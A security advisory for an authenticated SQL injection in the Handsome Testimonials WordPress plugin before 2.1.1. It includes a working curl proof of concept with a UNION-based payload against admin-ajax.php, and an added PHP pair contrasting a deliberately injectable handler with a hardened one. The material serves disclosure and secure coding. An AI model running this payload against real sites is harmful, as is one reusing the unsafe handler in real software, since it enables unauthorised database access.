WPVDB-ID: 42760007-0E59-4D45-8D64-86BC0B8DACEA
Published: Jun 29, 2021 - 12:00 a.m.

Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection

wpscan.com

The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated user (Subscriber role or above), does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.

PoC

curl -i -s -k -X $'POST' \
  -H $'X-Requested-With: XMLHttpRequest' \
  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' \
  -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H $'Origin: https://example.com' \
  -b $'[any authenticated user]' \
  --data-binary $'action=hndtst_previewShortcodeInstance&hndtst_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \
  $'https://example.com/wp-admin/admin-ajax.php'
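The following PHP pair is an added illustration, not the plugin's own code: it shows the unsanitised pattern the advisory describes next to a hardened WordPress AJAX handler. The handler names, table name, nonce action and required capability are assumed for the example.

```php
<?php
// Illustrative WordPress AJAX handlers (assumed names, not the plugin's code).

// Unsafe pattern: the POST value is concatenated straight into the query, so a
// value such as "-5049 UNION ALL SELECT ..." becomes part of the statement.
function example_preview_unsafe() {
    global $wpdb;
    $id  = $_POST['hndtst_previewShortcodeInstanceId'];
    $sql = "SELECT * FROM {$wpdb->prefix}example_testimonials WHERE id = " . $id;
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Hardened version of the same handler.
function example_preview_safe() {
    global $wpdb;

    // 1. Authorisation: a shortcode preview is an editing feature, so do not
    //    expose it to every logged-in account (e.g. Subscribers).
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the client must send a nonce for this action
    //    (assumed nonce action name and query argument).
    check_ajax_referer( 'example_preview_nonce', 'nonce' );

    // 3. Validation: absint() coerces the value to a non-negative integer, so
    //    any injected SQL text in the parameter is discarded; 0 means missing
    //    or invalid.
    $id = isset( $_POST['hndtst_previewShortcodeInstanceId'] )
        ? absint( wp_unslash( $_POST['hndtst_previewShortcodeInstanceId'] ) )
        : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    // 4. Parameterisation: $wpdb->prepare() binds %d as an integer, so the
    //    value can never change the structure of the query.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}example_testimonials WHERE id = %d",
        $id
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Register for authenticated users only (wp_ajax_ prefix, no wp_ajax_nopriv_).
add_action( 'wp_ajax_example_preview', 'example_preview_safe' );
```

Steps 3 and 4 each close the injection on their own; steps 1 and 2 limit who can reach the endpoint at all, which is the defence the advisory's "Subscriber+" scope points at.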

CPE Name               Operator  Version
handsome-testimonials  lt        2.1.1